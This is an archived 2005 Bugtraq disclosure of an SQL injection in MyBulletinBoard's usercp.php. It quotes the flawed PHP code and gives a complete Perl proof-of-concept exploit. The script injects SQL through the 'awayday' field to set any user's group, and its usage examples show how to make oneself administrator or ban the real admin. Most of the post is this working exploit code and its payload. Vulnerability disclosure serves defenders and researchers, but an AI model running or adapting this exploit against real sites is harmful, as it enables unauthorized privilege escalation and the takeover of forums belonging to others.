lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <op.sy8twtgumkj3qh@home-apqx014qil>
Date: Wed, 26 Oct 2005 13:01:31 +0500
From: Animal <cOre@...er.ru>
To: bugtraq@...urityfocus.com
Subject: SQL-Injection in MyBulletinBoard allows attacker to become a board admin.


Vendor:  www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and mayb prior.
Script:  usercp.php
Code:
>  if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] !=  
> "no")
>        {
>     [...]
>         $returndate =  
> $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
>     [...]
>      $newprofile = array(
>               "website" =>  
> addslashes(htmlspecialchars($mybb->input['website'])),
>               "icq" => intval($mybb->input['icq']),
>               "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
>               "yahoo" =>  
> addslashes(htmlspecialchars($mybb->input['yahoo'])),
>               "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
>               "birthday" => $bday,
>               "away" => $away,
>               "awaydate" => $awaydate,
>               "returndate" => $returndate,   // <--- not checked (bday  
> too, but anyway)
>               "awayreason" =>  
> addslashes(htmlspecialchars($mybb->input['awayreason']))
>               );
>     [...]
>      $db->update_query(TABLE_PREFIX."users", $newprofile,  
> "uid='".$mybb->user['uid']."'");
So: Attacker can replace "awayday" param by some SQL code and change any  
field in _users table.
     Changing "usergroup" for his "uid" to 4 makes him an admin. To use  
this bug attacker have to be
     a registered/awayting_activation user.

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

###   MyBB Preview Release 2 SQL-Injection PoC ExPlOiT   ###
###   ------------------------------------------------   ###
###   To use this you have to be registered member on    ###
###   a target.                                          ###
###   ------------------------------------------------   ###
###   Glossary:                                          ###
###     [MYBBUSER] - name of the field in cookie;        ###
###     [YOUR_ID]  - your uid :)                         ###
###     [ID]       - victim uid                          ###
###   Available groups:                                  ###
###     1 - Unregistered / Not Logged In                 ###
###     2 - Registered                                   ###
###     3 - Super Moderators                             ###
###     4 - Administrators                               ###
###     5 - Awayting Activation                          ###
###     6 - Moderators                                   ###
###     7 - Banned                                       ###
###   ------------------------------------------------   ###
###   Examples:                                          ###
###    1) TROUBLE --> U need an admin privileges.        ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [YOUR_ID] -g 4 server /mybb/         ###
###    2) TROUBLE --> U need to ban real admin.          ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [ID] -g 7 server /mybb/              ###

use IO::Socket;

$tmp=0;

while($tmp<@ARGV)
{
  if($ARGV[$tmp] eq "-u")
   {
    $mbuser=$ARGV[$tmp+1];
    $tmp++;
   }
  if($ARGV[$tmp] eq "-i")
   {
    $id=$ARGV[$tmp+1];
    $tmp++;
   }
  if($ARGV[$tmp] eq "-g")
   {
    $ugr=$ARGV[$tmp+1];
    $tmp++;
   }
  if($ARGV[$tmp] eq "-h")
   {
    &f_help();
   }
  $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
  &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target",  
PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept:  
*/*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type:
application/x-www-form-urlencoded\nContent-Length:  
".length($str)."\n\n$str\n";
while(<$sock>)
{
  if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n  
Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
#   S  u  B  r  O  u  T  i  N  e   #
#----------------------------------#


sub f_help()
{
print q(
  Usage: mybbpr2.pl <OPTIONS> SERVER PATH
  Options:
   -u USERKEY        mybbuser field from cookie.
   -i UID            User's uid. (Change group 4 this user)
   -g GROUP          New usergroup. (1-7)
   -h                Displays this help.
   );
  exit(-1);
}
#'
sub f_die($)
{
  print "\r\nERROR: $_[0]\r\n";
  exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 sept 2005. Don't remember.
Updated package is available (i hope).

ByE.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ